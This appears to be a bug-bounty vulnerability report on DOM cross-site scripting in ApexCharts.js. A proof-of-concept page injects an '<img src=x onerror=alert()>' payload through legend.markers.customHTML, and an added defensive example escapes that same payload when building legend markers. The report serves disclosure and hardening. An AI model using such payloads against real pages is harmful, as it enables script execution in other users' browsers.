Cross-site Scripting (XSS) - DOM in apexcharts/apexcharts.js

Valid
Reported on May 17th 2021

✍️ Description

The latest version of ApexCharts.js is vulnerable to Cross-Site Scripting (XSS).

🕵️‍♂️ Proof of Concept

Take the sample provided in samples/vanilla-js/scatter/scatter-images.html and change one of the legend.markers.customHTML functions so that it returns markup containing an event handler:

<body>
     <div id="chart"></div>
    <script>
        var options = {
          series: [{
          name: 'Messenger',
          data: [
            [16.4, 5.4],
             .....
          ]
        }, {
          name: 'Instagram',
          data: [
            [6.4, 5.4],
            .....
          ]
        }],
          chart: {
          height: 350,
          type: 'scatter',
          animations: {
            enabled: false,
          },
          zoom: {
            enabled: false,
          },
          toolbar: {
            show: false
          }
        },
        colors: ['#056BF6', '#D2376A'],
        xaxis: {
          tickAmount: 10,
          min: 0,
          max: 40
        },
        yaxis: {
          tickAmount: 7
        },
        markers: {
          size: 20
        },
        fill: {
          type: 'image',
          opacity: 1,
          image: {
            src: ['../../assets/images/ico-messenger.png', '../../assets/images/ico-instagram.png'],
            width: 40,
            height: 40
          }
        },
        legend: {
          labels: {
            useSeriesColors: true
          },
          markers: {
            customHTML: [
              function() {
                return '<span><i class="fab fa-facebook"></i><img src=x onerror=alert()></span>'
              }, function() {
                return '<span><i class="fab fa-instagram"></i></span>'
              }
            ]
          }
        }
        };

        var chart = new ApexCharts(document.querySelector("#chart"), options);
        chart.render();
    </script>
</body>

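The alert defined in <img src=x onerror=alert()> fires as soon as the page loads, which shows that the string returned by customHTML is inserted into the page as HTML without sanitization.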

💥 Impact

Through this vulnerability, an attacker can execute malicious scripts.
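
For applications that build legend markers from data they do not control, the following added example (not part of the original report and not ApexCharts code) shows one way to construct legend.markers.customHTML functions so that untrusted values cannot introduce markup. The helper names escapeHtml, safeClassList and legendMarker, and the sample series data, are assumptions made for illustration.

```javascript
// Added example: application-side hardening for legend.markers.customHTML.
// All helper names here are hypothetical; none are ApexCharts APIs.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape a value so the browser can only render it as text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Icon classes go inside an attribute, so keep only plain class tokens
// and drop anything containing quotes, angle brackets, '=' and so on.
const CLASS_TOKEN = /^[A-Za-z][A-Za-z0-9_-]*$/;
function safeClassList(value) {
  return String(value).split(/\s+/).filter((t) => CLASS_TOKEN.test(t)).join(' ');
}

// Returns a function suitable for one entry of legend.markers.customHTML.
// The markup skeleton is fixed; untrusted data only fills validated slots.
function legendMarker(iconClasses, label) {
  const cls = safeClassList(iconClasses);
  const text = escapeHtml(label);
  return function () {
    return '<span><i class="' + cls + '"></i>' + text + '</span>';
  };
}

// Constructed sample input: series metadata from an untrusted source,
// carrying the same payload string used in the proof of concept.
const untrustedSeries = [
  { icon: 'fab fa-facebook', label: '<img src=x onerror=alert()>' },
  { icon: '<img src=x onerror=alert()>', label: 'Instagram' },
];

// Legend options as they would be passed to the chart.
const legend = {
  labels: { useSeriesColors: true },
  markers: { customHTML: untrustedSeries.map((s) => legendMarker(s.icon, s.label)) },
};

// Evaluate every marker function, as the chart would when drawing the legend.
function renderAll() {
  return legend.markers.customHTML.map((fn) => fn());
}

console.log(renderAll().join('\n'));
```

This protects only strings the application itself assembles; any customHTML function that returns raw untrusted markup remains affected on vulnerable versions.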